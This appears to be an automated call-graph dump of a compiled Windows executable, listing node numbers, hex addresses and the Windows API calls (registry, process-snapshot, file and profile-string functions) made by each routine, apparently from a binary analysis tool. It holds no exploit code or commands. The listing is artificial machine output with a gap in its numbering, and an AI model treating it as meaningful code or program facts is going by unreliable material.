__wsopen_s 98368->98409 98370 c61645 98374 c5be6d 8 API calls 98370->98374 98382 c6044d messages 98370->98382 98372 ca61fe 98408 cc3ef6 81 API calls __wsopen_s 98372->98408 98373 ca5c7f 98379 c5be6d 8 API calls 98373->98379 98373->98382 98374->98382 98377 c5be6d 8 API calls 98377->98383 98379->98382 98380 c705d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98380->98383 98381 c5bf07 8 API calls 98381->98383 98382->98327 98383->98366 98383->98367 98383->98368 98383->98370 98383->98372 98383->98373 98383->98377 98383->98380 98383->98381 98383->98382 98384 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98383->98384 98385 ca60b9 98383->98385 98387 c60a5e messages 98383->98387 98404 c61940 253 API calls 2 library calls 98383->98404 98405 c61e00 40 API calls messages 98383->98405 98384->98383 98406 cc3ef6 81 API calls __wsopen_s 98385->98406 98407 cc3ef6 81 API calls __wsopen_s 98387->98407 98388->98333 98389->98333 98391 c5b412 98390->98391 98392 c5b40c 98390->98392 98391->98335 98392->98391 98393 c5be6d 8 API calls 98392->98393 98393->98391 98394->98342 98396 c5be81 98395->98396 98398 c5be90 __fread_nolock 98395->98398 98397 c7019b 8 API calls 98396->98397 98396->98398 98397->98398 98398->98351 98401 c5c78b messages 98399->98401 98400 c5c7c6 messages 98400->98361 98401->98400 98403 c6e29c 8 API calls messages 98401->98403 98403->98400 98404->98383 98405->98383 98406->98387 98407->98382 98408->98382 98409->98382 98410 c708c0 98419 c70d22 GetModuleHandleW 98410->98419 98412 c708c8 98413 c708fe 98412->98413 98414 c708cc 98412->98414 98421 c75194 28 API calls _abort 98413->98421 98416 c708d7 98414->98416 98420 c75176 28 API calls _abort 98414->98420 98417 c70906 98419->98412 98420->98416 98421->98417 98422 c7f08e 98423 c7f09a __FrameHandler3::FrameUnwindToState 98422->98423 98424 c7f0a6 98423->98424 98425 c7f0bb 98423->98425 98441 c7f669 20 API calls __dosmaperr 
98424->98441 98435 c7951d EnterCriticalSection 98425->98435 98428 c7f0ab 98442 c82b7c 26 API calls __wsopen_s 98428->98442 98429 c7f0c7 98436 c7f0fb 98429->98436 98434 c7f0b6 __wsopen_s 98435->98429 98444 c7f126 98436->98444 98438 c7f108 98439 c7f0d4 98438->98439 98464 c7f669 20 API calls __dosmaperr 98438->98464 98443 c7f0f1 LeaveCriticalSection __fread_nolock 98439->98443 98441->98428 98442->98434 98443->98434 98445 c7f134 98444->98445 98446 c7f14e 98444->98446 98475 c7f669 20 API calls __dosmaperr 98445->98475 98465 c7dce5 98446->98465 98449 c7f157 98472 c89799 98449->98472 98450 c7f139 98476 c82b7c 26 API calls __wsopen_s 98450->98476 98454 c7f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98454->98438 98455 c7f1df 98458 c7f20e 98455->98458 98459 c7f1fc 98455->98459 98456 c7f25b 98457 c7f268 98456->98457 98456->98458 98478 c7f669 20 API calls __dosmaperr 98457->98478 98458->98454 98479 c7f2bb 30 API calls 2 library calls 98458->98479 98477 c7f43f 31 API calls 4 library calls 98459->98477 98462 c7f206 98462->98454 98464->98439 98466 c7dd06 98465->98466 98467 c7dcf1 98465->98467 98466->98449 98480 c7f669 20 API calls __dosmaperr 98467->98480 98469 c7dcf6 98481 c82b7c 26 API calls __wsopen_s 98469->98481 98471 c7dd01 98471->98449 98482 c89616 98472->98482 98474 c7f173 98474->98454 98474->98455 98474->98456 98475->98450 98476->98454 98477->98462 98478->98454 98479->98454 98480->98469 98481->98471 98483 c89622 __FrameHandler3::FrameUnwindToState 98482->98483 98484 c8962a 98483->98484 98485 c89642 98483->98485 98517 c7f656 20 API calls __dosmaperr 98484->98517 98486 c896f6 98485->98486 98490 c8967a 98485->98490 98522 c7f656 20 API calls __dosmaperr 98486->98522 98489 c8962f 98518 c7f669 20 API calls __dosmaperr 98489->98518 98507 c854d7 EnterCriticalSection 98490->98507 98491 c896fb 98523 c7f669 20 API calls __dosmaperr 98491->98523 98495 c89680 98497 c896b9 98495->98497 98498 c896a4 98495->98498 98496 c89703 98524 c82b7c 26 API calls __wsopen_s 98496->98524 98508 
c8971b 98497->98508 98519 c7f669 20 API calls __dosmaperr 98498->98519 98502 c896a9 98520 c7f656 20 API calls __dosmaperr 98502->98520 98503 c89637 __wsopen_s 98503->98474 98504 c896b4 98521 c896ee LeaveCriticalSection __wsopen_s 98504->98521 98507->98495 98525 c85754 98508->98525 98510 c8972d 98511 c89735 98510->98511 98512 c89746 SetFilePointerEx 98510->98512 98538 c7f669 20 API calls __dosmaperr 98511->98538 98513 c8975e GetLastError 98512->98513 98516 c8973a 98512->98516 98539 c7f633 20 API calls __dosmaperr 98513->98539 98516->98504 98517->98489 98518->98503 98519->98502 98520->98504 98521->98503 98522->98491 98523->98496 98524->98503 98526 c85761 98525->98526 98527 c85776 98525->98527 98540 c7f656 20 API calls __dosmaperr 98526->98540 98532 c8579b 98527->98532 98542 c7f656 20 API calls __dosmaperr 98527->98542 98529 c85766 98541 c7f669 20 API calls __dosmaperr 98529->98541 98532->98510 98533 c857a6 98543 c7f669 20 API calls __dosmaperr 98533->98543 98534 c8576e 98534->98510 98536 c857ae 98544 c82b7c 26 API calls __wsopen_s 98536->98544 98538->98516 98539->98516 98540->98529 98541->98534 98542->98533 98543->98536 98544->98534 98545 c5f48c 98548 c5ca50 98545->98548 98549 c5ca6b 98548->98549 98550 ca14af 98549->98550 98551 ca1461 98549->98551 98570 c5ca90 98549->98570 98593 cd61ff 253 API calls 2 library calls 98550->98593 98554 ca146b 98551->98554 98557 ca1478 98551->98557 98551->98570 98591 cd6690 253 API calls 98554->98591 98572 c5cd60 98557->98572 98592 cd6b2d 253 API calls 2 library calls 98557->98592 98558 c6e781 39 API calls 98558->98570 98561 ca1742 98561->98561 98563 c5cf30 39 API calls 98563->98570 98566 c5cd8e 98567 ca168b 98595 cd6569 81 API calls 98567->98595 98570->98558 98570->98563 98570->98566 98570->98567 98570->98572 98573 c5b3fe 8 API calls 98570->98573 98576 c602f0 253 API calls 98570->98576 98577 c5be6d 8 API calls 98570->98577 98579 c5bdc1 98570->98579 98583 c6e73b 39 API calls 98570->98583 98584 c6aa19 253 API calls 98570->98584 98585 
c705d2 5 API calls __Init_thread_wait 98570->98585 98586 c6bbd2 8 API calls 98570->98586 98587 c70433 29 API calls __onexit 98570->98587 98588 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98570->98588 98589 c6f4ed 81 API calls 98570->98589 98590 c6f354 253 API calls 98570->98590 98594 caff4f 8 API calls 98570->98594 98572->98566 98596 cc3ef6 81 API calls __wsopen_s 98572->98596 98573->98570 98576->98570 98577->98570 98580 c5bdcc 98579->98580 98582 c5bdfb 98580->98582 98597 c5bf39 39 API calls 98580->98597 98582->98570 98583->98570 98584->98570 98585->98570 98586->98570 98587->98570 98588->98570 98589->98570 98590->98570 98591->98557 98592->98572 98593->98570 98594->98570 98595->98572 98596->98561 98597->98582 98598 c60e6f 98599 c60e83 98598->98599 98604 c613d5 98598->98604 98600 c60e95 98599->98600 98601 c7016b 8 API calls 98599->98601 98602 ca55d0 98600->98602 98603 c5b3fe 8 API calls 98600->98603 98605 c60eee 98600->98605 98601->98600 98702 cc1a29 8 API calls 98602->98702 98603->98600 98604->98600 98608 c5be6d 8 API calls 98604->98608 98622 c6044d messages 98605->98622 98631 c62ad0 98605->98631 98608->98600 98609 ca62cf 98706 cc3ef6 81 API calls __wsopen_s 98609->98706 98611 c61645 98617 c5be6d 8 API calls 98611->98617 98611->98622 98612 c7016b 8 API calls 98630 c60326 messages 98612->98630 98614 ca61fe 98705 cc3ef6 81 API calls __wsopen_s 98614->98705 98615 c5be6d 8 API calls 98615->98630 98616 ca5c7f 98621 c5be6d 8 API calls 98616->98621 98616->98622 98617->98622 98621->98622 98623 c5bf07 8 API calls 98623->98630 98624 c70433 29 API calls pre_c_initialization 98624->98630 98625 c705d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98625->98630 98626 c60a5e messages 98704 cc3ef6 81 API calls __wsopen_s 98626->98704 98627 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98627->98630 98628 ca60b9 98703 cc3ef6 81 API calls __wsopen_s 
98628->98703 98630->98609 98630->98611 98630->98612 98630->98614 98630->98615 98630->98616 98630->98622 98630->98623 98630->98624 98630->98625 98630->98626 98630->98627 98630->98628 98700 c61940 253 API calls 2 library calls 98630->98700 98701 c61e00 40 API calls messages 98630->98701 98632 c62b36 98631->98632 98633 c62f70 98631->98633 98635 ca7b7c 98632->98635 98636 c62b50 98632->98636 99041 c705d2 5 API calls __Init_thread_wait 98633->99041 99051 cd79f9 253 API calls 98635->99051 98639 c630e0 9 API calls 98636->98639 98638 c62f7a 98641 c62fbb 98638->98641 99042 c5b25f 98638->99042 98642 c62b60 98639->98642 98640 ca7b88 98640->98630 98646 ca7b91 98641->98646 98648 c62fec 98641->98648 98644 c630e0 9 API calls 98642->98644 98645 c62b76 98644->98645 98645->98641 98647 c62bac 98645->98647 99052 cc3ef6 81 API calls __wsopen_s 98646->99052 98647->98646 98662 c62bc8 __fread_nolock 98647->98662 98649 c5b3fe 8 API calls 98648->98649 98651 c62ff9 98649->98651 99049 c6e662 253 API calls 98651->99049 98652 c62f94 99048 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98652->99048 98654 ca7bb9 99053 cc3ef6 81 API calls __wsopen_s 98654->99053 98657 c63032 99050 c6fe59 8 API calls 98657->99050 98658 ca7c1c 99055 cd60a2 53 API calls _wcslen 98658->99055 98659 c62cfc 98660 c630e0 9 API calls 98659->98660 98663 c62d09 98660->98663 98662->98651 98662->98654 98664 c7016b 8 API calls 98662->98664 98665 c7019b 8 API calls 98662->98665 98670 c602f0 253 API calls 98662->98670 98671 c62cef 98662->98671 98672 ca7bfd 98662->98672 98675 ca7bb4 98662->98675 98667 c630e0 9 API calls 98663->98667 98668 ca7d45 98663->98668 98664->98662 98665->98662 98674 c62d23 98667->98674 98668->98675 99056 cc3ef6 81 API calls __wsopen_s 98668->99056 98670->98662 98671->98658 98671->98659 99054 cc3ef6 81 API calls __wsopen_s 98672->99054 98674->98668 98676 c5be6d 8 API calls 98674->98676 98678 c62d87 messages 98674->98678 98675->98630 98676->98678 98677 c630e0 9 API calls 98677->98678 
98678->98657 98678->98668 98678->98675 98678->98677 98681 c62e3b messages 98678->98681 98707 cc276a 98678->98707 98711 cbe9c5 GetFileAttributesW 98678->98711 98713 ccde5d 98678->98713 98718 cc65b4 98678->98718 98723 cdac49 98678->98723 98728 cc4ad5 98678->98728 98733 c6f95e 98678->98733 98740 cc6d2d 98678->98740 98753 cc874a 98678->98753 98780 c57953 98678->98780 98784 cc5ed5 98678->98784 98814 cd9eea 98678->98814 98817 cdcd16 98678->98817 98906 cdeb63 98678->98906 98942 cc95f6 98678->98942 98957 cc8e39 98678->98957 98976 cc6561 98678->98976 98983 c6be75 98678->98983 98679 c62edd 98679->98630 98681->98679 99040 c6e29c 8 API calls messages 98681->99040 98700->98630 98701->98630 98702->98622 98703->98626 98704->98622 98705->98622 98706->98622 98708 cc2778 98707->98708 98709 cc2773 98707->98709 98708->98678 99057 cc183b 98709->99057 98712 cbe9d1 98711->98712 98712->98678 98714 c5b3fe 8 API calls 98713->98714 98715 ccde70 98714->98715 98716 cc183b 10 API calls 98715->98716 98717 ccde78 98716->98717 98717->98678 99082 c58e70 98718->99082 98722 cc65d1 98722->98678 98724 c58e70 52 API calls 98723->98724 98725 cdac65 98724->98725 99114 cbdc9c CreateToolhelp32Snapshot Process32FirstW 98725->99114 98727 cdac74 98727->98678 98729 c58e70 52 API calls 98728->98729 98730 cc4ae8 98729->98730 99229 cbda81 98730->99229 98732 cc4af0 98732->98678 99245 c5c92d 98733->99245 98735 c6f972 98736 cafac0 Sleep 98735->98736 98737 c6f97a timeGetTime 98735->98737 98738 c5c92d 39 API calls 98737->98738 98739 c6f990 98738->98739 98739->98678 98741 c58e70 52 API calls 98740->98741 98742 cc6d47 98741->98742 98743 cc6d84 98742->98743 98745 c5c92d 39 API calls 98742->98745 99251 cbe783 98743->99251 98746 cc6d76 98745->98746 98746->98743 99256 c5557e 98746->99256 98747 cc6d92 99266 c57a59 98747->99266 98751 c58e70 52 API calls 98751->98747 98752 cc6dd7 98752->98678 98754 cc875a __wsopen_s 98753->98754 98755 c58e70 52 API calls 98754->98755 98756 cc877b 98755->98756 98757 c5c92d 39 API calls 
98756->98757 98764 cc8799 98756->98764 98757->98764 98758 c58e70 52 API calls 98759 cc887c 98758->98759 98760 c5557e 9 API calls 98759->98760 98761 cc88a7 98760->98761 99274 c7d913 98761->99274 98763 cc88cd 98765 cc88f7 GetCurrentDirectoryW SetCurrentDirectoryW 98763->98765 98764->98758 98769 cc8973 98764->98769 98766 cc8921 98765->98766 98765->98769 98767 cbe387 4 API calls 98766->98767 98768 cc892a 98767->98768 98768->98769 98770 cbe9c5 GetFileAttributesW 98768->98770 98769->98678 98771 cc8938 98770->98771 98772 cc89cb 98771->98772 98773 cc8940 GetFileAttributesW SetFileAttributesW 98771->98773 99277 cc9f9f FindFirstFileW 98772->99277 98774 cc8969 SetCurrentDirectoryW 98773->98774 98775 cc89b1 98773->98775 98774->98769 98777 cc89b5 SetCurrentDirectoryW 98775->98777 98778 cc8a02 SetCurrentDirectoryW 98775->98778 98777->98772 98778->98769 98779 cc89ea 98779->98778 98781 c5795d 98780->98781 98782 c5796c 98780->98782 98781->98678 98782->98781 98783 c57971 CloseHandle 98782->98783 98783->98781 98785 cc5fbd 98784->98785 98786 cc5ef4 98784->98786 98788 c58e70 52 API calls 98785->98788 98797 cc6011 98785->98797 98787 c5c92d 39 API calls 98786->98787 98789 cc5eff 98787->98789 98790 cc5fef 98788->98790 98791 c5c92d 39 API calls 98789->98791 98792 c58e70 52 API calls 98790->98792 98793 cc5f15 98791->98793 98794 cc6001 98792->98794 98793->98785 98796 c5bf07 8 API calls 98793->98796 99321 cbd836 98794->99321 98798 cc5f26 98796->98798 98797->98678 98799 c5bf07 8 API calls 98798->98799 98800 cc5f2f 98799->98800 98801 c58e70 52 API calls 98800->98801 98802 cc5f3c 98801->98802 98803 c5694e 8 API calls 98802->98803 98804 cc5f4f 98803->98804 98805 c57af4 8 API calls 98804->98805 98806 cc5f60 98805->98806 98813 cc5f89 98806->98813 99364 cbdc8e 98806->99364 98808 c5c92d 39 API calls 98808->98785 98810 c5b25f 8 API calls 98811 cc5f80 98810->98811 98812 cbda81 12 API calls 98811->98812 98812->98813 98813->98808 99453 cd88b6 98814->99453 98816 cd9efa 98816->98678 98818 c5bf07 8 API 
calls 98817->98818 98819 cdcd39 98818->98819 98820 c5bf07 8 API calls 98819->98820 98821 cdcd42 98820->98821 98822 c5bf07 8 API calls 98821->98822 98823 cdcd4b 98822->98823 98824 c58e70 52 API calls 98823->98824 98834 cdcdda 98823->98834 98825 cdcd71 98824->98825 99596 cdd6b1 98825->99596 98827 cdcda5 99622 cdd2f7 98827->99622 98829 cdcdd6 98830 cdce76 RegCreateKeyExW 98829->98830 98831 cdce0f RegConnectRegistryW 98829->98831 98829->98834 98833 cdcf0e 98830->98833 98841 cdcead 98830->98841 98831->98830 98831->98834 98835 cdd1d6 RegCloseKey 98833->98835 98836 c58e70 52 API calls 98833->98836 98834->98678 98835->98834 98837 cdd1e9 RegCloseKey 98835->98837 98838 cdcf29 98836->98838 98837->98834 99632 c74db8 98838->99632 98840 cdcf38 98842 cdcf44 98840->98842 98843 cdcf96 98840->98843 98841->98834 98845 cdceff RegCloseKey 98841->98845 98844 c58e70 52 API calls 98842->98844 98846 c58e70 52 API calls 98843->98846 98847 cdcf4e _wcslen 98844->98847 98845->98834 98848 cdcfa0 98846->98848 98853 c58e70 52 API calls 98847->98853 98849 c74db8 _strftime 40 API calls 98848->98849 98850 cdcfaf 98849->98850 98851 cdcfbf 98850->98851 98852 cdd047 98850->98852 98855 c58e70 52 API calls 98851->98855 98854 c58e70 52 API calls 98852->98854 98856 cdcf70 98853->98856 98857 cdd051 98854->98857 98858 cdcfc9 _wcslen 98855->98858 98859 c58e70 52 API calls 98856->98859 98860 c74db8 _strftime 40 API calls 98857->98860 98866 c58e70 52 API calls 98858->98866 98861 cdcf85 98859->98861 98862 cdd060 98860->98862 98863 cdd2bb RegSetValueExW 98861->98863 98864 cdd156 98862->98864 98865 cdd070 98862->98865 98863->98835 98885 cdd01f 98863->98885 98869 c58e70 52 API calls 98864->98869 98867 c58e70 52 API calls 98865->98867 98868 cdcfeb 98866->98868 98871 cdd07a 98867->98871 98872 c58e70 52 API calls 98868->98872 98870 cdd160 98869->98870 98873 c74db8 _strftime 40 API calls 98870->98873 98874 c7019b 8 API calls 98871->98874 98875 cdd000 RegSetValueExW 98872->98875 98876 cdd16f 98873->98876 98877 cdd09f 
98874->98877 98875->98835 98875->98885 98880 c58e70 52 API calls 98877->98880 98885->98835 98907 c5bf07 8 API calls 98906->98907 98908 cdeb7a 98907->98908 98909 c58e70 52 API calls 98908->98909 98910 cdeb89 98909->98910 99646 c57a14 98910->99646 98913 c58e70 52 API calls 98914 cdeba9 98913->98914 98915 cdec26 98914->98915 98916 cdebc1 98914->98916 98917 c58e70 52 API calls 98915->98917 98918 c5c92d 39 API calls 98916->98918 98919 cdec2b 98917->98919 98920 cdebc6 98918->98920 98921 cdec38 98919->98921 98922 cdec73 98919->98922 98920->98921 98924 cdebdf 98920->98924 98923 c56ab6 8 API calls 98921->98923 98925 cdec8b 98922->98925 98927 c5c92d 39 API calls 98922->98927 98939 cdec45 98923->98939 98926 c58685 8 API calls 98924->98926 98928 c5c92d 39 API calls 98925->98928 98933 cdeca4 98925->98933 98930 cdebec 98926->98930 98927->98925 98928->98933 98929 c5be6d 8 API calls 98931 cdecbe 98929->98931 98932 c57af4 8 API calls 98930->98932 99651 cb9b57 98931->99651 98935 cdebfa 98932->98935 98933->98929 98936 c58685 8 API calls 98935->98936 98937 cdec13 98936->98937 98938 c57af4 8 API calls 98937->98938 98941 cdec21 98938->98941 98939->98678 98940 c57a59 8 API calls 98940->98939 98941->98940 98943 c5bf07 8 API calls 98942->98943 98944 cc9607 98943->98944 98945 c58e70 52 API calls 98944->98945 98946 cc9616 98945->98946 98947 c5557e 9 API calls 98946->98947 98948 cc9621 98947->98948 98949 c58e70 52 API calls 98948->98949 98950 cc962e 98949->98950 98951 c58e70 52 API calls 98950->98951 98952 cc9640 98951->98952 98953 c58e70 52 API calls 98952->98953 98954 cc9655 WritePrivateProfileStringW 98953->98954 98955 cc966b WritePrivateProfileStringW 98954->98955 98956 cc9677 98954->98956 98955->98956 98956->98678 98958 c5bf07 8 API calls 98957->98958 98959 cc8e4a 98958->98959 98960 c7019b 8 API calls 98959->98960 98961 cc8e54 98960->98961 99670 c541a6 98961->99670 98964 c58e70 52 API calls 98965 cc8e6d 98964->98965 98966 c5557e 9 API calls 98965->98966 98967 cc8e78 98966->98967 98968 
c58e70 52 API calls 98967->98968 98969 cc8e85 98968->98969 98970 c58e70 52 API calls 98969->98970 98971 cc8e97 98970->98971 98972 c58e70 52 API calls 98971->98972 98973 cc8eac GetPrivateProfileStringW 98972->98973 98974 c56ab6 8 API calls 98973->98974 98975 cc8ecf messages 98974->98975 98975->98678 98977 c58e70 52 API calls 98976->98977 98978 cc6577 98977->98978 99673 cbdb69 98978->99673 98980 cc657f 98981 cc6583 GetLastError 98980->98981 98982 cc6598 98980->98982 98981->98982 98982->98678 98984 c56ab6 8 API calls 98983->98984 98985 c6be8d 98984->98985 98986 c7016b 8 API calls 98985->98986 98990 ca8f7a 98985->98990 98988 c6bea6 98986->98988 98989 c7019b 8 API calls 98988->98989 98992 c6beb7 98989->98992 98991 c6bf1f 98990->98991 99744 cca607 39 API calls 98990->99744 98995 c5c92d 39 API calls 98991->98995 98999 c6bf2c 98991->98999 98993 c57953 CloseHandle 98992->98993 98994 c6bec2 98993->98994 98996 c5bf07 8 API calls 98994->98996 98997 ca8fdc 98995->98997 98998 c6beca 98996->98998 98997->98999 99000 ca8fe4 98997->99000 99001 c57953 CloseHandle 98998->99001 99721 c6fdc9 98999->99721 99003 c5c92d 39 API calls 99000->99003 99004 c6bed1 99001->99004 99008 c6bf33 99003->99008 99005 c58e70 52 API calls 99004->99005 99006 c6bedd 99005->99006 99007 c57953 CloseHandle 99006->99007 99011 c6bee7 99007->99011 99009 ca8ff9 99008->99009 99010 c6bf4e 99008->99010 99014 c7019b 8 API calls 99009->99014 99013 c57a14 8 API calls 99010->99013 99698 c56e52 99011->99698 99016 c6bf56 99013->99016 99017 ca8ffe 99014->99017 99726 c6bfbc 99016->99726 99021 ca9012 99017->99021 99745 c541c9 99017->99745 99018 c6bf00 99706 c56b12 99018->99706 99019 ca8f72 99743 c57923 CloseHandle messages 99019->99743 99030 ca9016 __fread_nolock 99021->99030 99748 cc1759 8 API calls ___scrt_fastfail 99021->99748 99022 c6bf65 99027 c57a59 8 API calls 99022->99027 99022->99030 99031 c6bf79 99027->99031 99028 c6bf0e 99740 c56afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 99028->99740 99034 c6bfb3 
99031->99034 99035 c57953 CloseHandle 99031->99035 99032 ca8f3b 99742 cbd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 99032->99742 99033 c6bf15 99033->98991 99033->99032 99034->98678 99037 c6bfa7 99035->99037 99037->99034 99741 c57923 CloseHandle messages 99037->99741 99038 ca8f52 99038->98991 99040->98681 99041->98638 99043 c5b26e _wcslen 99042->99043 99044 c7019b 8 API calls 99043->99044 99045 c5b296 __fread_nolock 99044->99045 99046 c7016b 8 API calls 99045->99046 99047 c5b2ac 99046->99047 99047->98652 99048->98641 99049->98657 99050->98657 99051->98640 99052->98675 99053->98675 99054->98675 99055->98674 99056->98675 99058 cc1852 99057->99058 99072 cc196b 99057->99072 99059 cc1872 99058->99059 99060 cc189f 99058->99060 99062 cc18b6 99058->99062 99059->99060 99064 cc1886 99059->99064 99061 c7019b 8 API calls 99060->99061 99075 cc1894 __fread_nolock 99061->99075 99063 c7019b 8 API calls 99062->99063 99073 cc18d3 99062->99073 99063->99073 99066 c7019b 8 API calls 99064->99066 99065 cc18fa 99067 c7019b 8 API calls 99065->99067 99066->99075 99068 cc1900 99067->99068 99076 c6c1f1 99068->99076 99069 c7016b 8 API calls 99069->99072 99072->98708 99073->99064 99073->99065 99073->99075 99075->99069 99077 c7019b 8 API calls 99076->99077 99078 c6c208 99077->99078 99079 c7016b 8 API calls 99078->99079 99080 c6c214 99079->99080 99081 c6f9e2 10 API calls 99080->99081 99081->99075 99083 c58e85 99082->99083 99100 c58e82 99082->99100 99084 c58e8d 99083->99084 99085 c58ebb 99083->99085 99110 c75556 26 API calls 99084->99110 99086 c96b10 99085->99086 99089 c58ecd 99085->99089 99097 c96a29 99085->99097 99113 c75513 26 API calls 99086->99113 99111 c6fe8f 51 API calls 99089->99111 99090 c58e9d 99093 c7016b 8 API calls 99090->99093 99091 c96b28 99091->99091 99095 c58ea7 99093->99095 99098 c5b25f 8 API calls 99095->99098 99096 c96aa2 99112 c6fe8f 51 API calls 99096->99112 99097->99096 99099 c7019b 8 API calls 99097->99099 99098->99100 99101 c96a72 99099->99101 99105 
101204->101153 101205->101153 101206->101153 101207->101153 101208->101160 101209->101160 101210->101160 101212 c602f0 253 API calls 101211->101212 101214 c5e94d 101211->101214 101212->101214 101215 c5e9bb messages 101214->101215 101216 c5ed85 101214->101216 101217 c5ea73 101214->101217 101223 c5eb68 101214->101223 101226 c7016b 8 API calls 101214->101226 101229 ca3176 101214->101229 101238 c5ead9 __fread_nolock messages 101214->101238 101215->101174 101216->101215 101227 c7019b 8 API calls 101216->101227 101217->101216 101219 c5ea7e 101217->101219 101218 c5ecaf 101221 c5ecc4 101218->101221 101222 ca3167 101218->101222 101220 c7016b 8 API calls 101219->101220 101233 c5ea85 __fread_nolock 101220->101233 101224 c7016b 8 API calls 101221->101224 101249 cd6062 8 API calls 101222->101249 101228 c7019b 8 API calls 101223->101228 101235 c5eb1a 101224->101235 101226->101214 101227->101233 101228->101238 101250 cc3ef6 81 API calls __wsopen_s 101229->101250 101230 c7016b 8 API calls 101231 c5eaa6 101230->101231 101231->101238 101244 c5d210 253 API calls 101231->101244 101233->101230 101233->101231 101234 ca3156 101248 cc3ef6 81 API calls __wsopen_s 101234->101248 101235->101174 101238->101218 101238->101234 101238->101235 101239 ca3131 101238->101239 101241 ca310f 101238->101241 101245 c54485 253 API calls 101238->101245 101247 cc3ef6 81 API calls __wsopen_s 101239->101247 101246 cc3ef6 81 API calls __wsopen_s 101241->101246 101243->101175 101244->101238 101245->101238 101246->101235 101247->101235 101248->101235 101249->101229 101250->101215 101251->101187 101252->101180 101253->101188 101254->101187 101255->101187 101256->101187 101257->101187 101258->101187 101259->101187 101260 c88792 101265 c8854e 101260->101265 101263 c887ba 101269 c8857f try_get_first_available_module 101265->101269 101267 c8877e 101281 c82b7c 26 API calls __wsopen_s 101267->101281 101271 c7919b 40 API calls 101269->101271 101276 c886c8 101269->101276 101270 c886d3 101270->101263 101277 c90d24 
101270->101277 101272 c8871c 101271->101272 101273 c7919b 40 API calls 101272->101273 101272->101276 101274 c8873b 101273->101274 101275 c7919b 40 API calls 101274->101275 101274->101276 101275->101276 101276->101270 101280 c7f669 20 API calls __dosmaperr 101276->101280 101282 c90421 101277->101282 101279 c90d3f 101279->101263 101280->101267 101281->101270 101283 c9042d __FrameHandler3::FrameUnwindToState 101282->101283 101284 c9043b 101283->101284 101286 c90474 101283->101286 101340 c7f669 20 API calls __dosmaperr 101284->101340 101293 c909fb 101286->101293 101287 c90440 101341 c82b7c 26 API calls __wsopen_s 101287->101341 101292 c9044a __wsopen_s 101292->101279 101343 c907cf 101293->101343 101296 c90a2d 101375 c7f656 20 API calls __dosmaperr 101296->101375 101297 c90a46 101361 c855b1 101297->101361 101300 c90a32 101376 c7f669 20 API calls __dosmaperr 101300->101376 101301 c90a4b 101302 c90a6b 101301->101302 101303 c90a54 101301->101303 101374 c9073a CreateFileW 101302->101374 101377 c7f656 20 API calls __dosmaperr 101303->101377 101307 c90a59 101378 c7f669 20 API calls __dosmaperr 101307->101378 101309 c90b21 GetFileType 101311 c90b2c GetLastError 101309->101311 101312 c90b73 101309->101312 101310 c90af6 GetLastError 101380 c7f633 20 API calls __dosmaperr 101310->101380 101381 c7f633 20 API calls __dosmaperr 101311->101381 101383 c854fa 21 API calls 2 library calls 101312->101383 101313 c90aa4 101313->101309 101313->101310 101379 c9073a CreateFileW 101313->101379 101316 c90b3a CloseHandle 101316->101300 101318 c90b63 101316->101318 101382 c7f669 20 API calls __dosmaperr 101318->101382 101320 c90ae9 101320->101309 101320->101310 101322 c90b94 101327 c90be0 101322->101327 101384 c9094b 72 API calls 3 library calls 101322->101384 101323 c90b68 101323->101300 101326 c90c06 101328 c90c0d 101326->101328 101329 c90c1e 101326->101329 101327->101328 101385 c904ed 72 API calls 4 library calls 101327->101385 101386 c88a3e 101328->101386 101331 c90498 101329->101331 101332 
c90c9c CloseHandle 101329->101332 101342 c904c1 LeaveCriticalSection __wsopen_s 101331->101342 101401 c9073a CreateFileW 101332->101401 101334 c90cc7 101335 c90cd1 GetLastError 101334->101335 101336 c90cfd 101334->101336 101402 c7f633 20 API calls __dosmaperr 101335->101402 101336->101331 101338 c90cdd 101403 c856c3 21 API calls 2 library calls 101338->101403 101340->101287 101341->101292 101342->101292 101344 c907f0 101343->101344 101351 c9080a 101343->101351 101344->101351 101411 c7f669 20 API calls __dosmaperr 101344->101411 101346 c90842 101350 c90871 101346->101350 101413 c7f669 20 API calls __dosmaperr 101346->101413 101348 c907ff 101412 c82b7c 26 API calls __wsopen_s 101348->101412 101358 c908c4 101350->101358 101415 c7da9d 26 API calls 2 library calls 101350->101415 101404 c9075f 101351->101404 101354 c908bf 101356 c9093e 101354->101356 101354->101358 101355 c90866 101414 c82b7c 26 API calls __wsopen_s 101355->101414 101416 c82b8c 11 API calls _abort 101356->101416 101358->101296 101358->101297 101360 c9094a 101362 c855bd __FrameHandler3::FrameUnwindToState 101361->101362 101419 c832ee EnterCriticalSection 101362->101419 101364 c855e9 101423 c85390 21 API calls 3 library calls 101364->101423 101365 c855c4 101365->101364 101370 c85657 EnterCriticalSection 101365->101370 101372 c8560b 101365->101372 101368 c85634 __wsopen_s 101368->101301 101369 c855ee 101369->101372 101424 c854d7 EnterCriticalSection 101369->101424 101371 c85664 LeaveCriticalSection 101370->101371 101370->101372 101371->101365 101420 c856ba 101372->101420 101374->101313 101375->101300 101376->101331 101377->101307 101378->101300 101379->101320 101380->101300 101381->101316 101382->101323 101383->101322 101384->101327 101385->101326 101387 c85754 __wsopen_s 26 API calls 101386->101387 101388 c88a4e 101387->101388 101389 c88a54 101388->101389 101393 c85754 __wsopen_s 26 API calls 101388->101393 101400 c88a86 101388->101400 101426 c856c3 21 API calls 2 library calls 101389->101426 101391 c85754 
